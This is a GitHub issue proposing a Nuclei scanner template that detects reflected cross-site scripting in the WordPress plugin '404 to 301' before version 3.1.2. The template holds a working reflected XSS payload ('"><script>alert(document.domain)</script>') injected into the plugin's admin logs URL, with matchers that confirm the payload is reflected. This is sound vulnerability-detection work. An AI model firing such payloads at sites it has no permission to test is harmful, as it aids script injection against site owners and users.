### ISSUE TITLE
404 to 301 < 3.1.2 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4690]
```yaml
id: 404-to-301-xss

info:
  name: 404 to 301 < 3.1.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=jj4t3-logs&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
